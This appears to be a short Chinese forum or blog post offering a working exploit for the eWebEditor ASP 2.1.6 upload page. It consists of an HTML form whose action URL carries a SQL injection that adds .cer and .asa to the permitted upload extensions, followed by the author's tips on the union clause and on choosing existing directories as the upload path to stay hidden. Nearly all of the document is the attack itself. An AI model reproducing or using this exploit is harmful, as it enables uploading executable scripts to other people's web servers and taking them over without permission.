<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br> <form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S_ID,S_Name,S_Dir,S_CSS,'UploadFile',S_Width,S_Height,S_Memo,S_IsSys,[S_FileExt]%2b'|cer' ,S_FlashExt,[S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=Fuck> </form>
?这是别人写的,我改了下,其中标红的时要注意的。
第一个地方最好加上1=2,不然实际应用中有可能union的不会被加上
第二个地方是可以自自定义上传路径的,但是一定要是存在的,可以考虑
写道
Admin
ButtonImage
CSS
db
Dialog
Example
Include
SysImage
ButtonImage
CSS
db
Dialog
Example
Include
SysImage
?
这样可以有一定的隐蔽性,别的就没什么了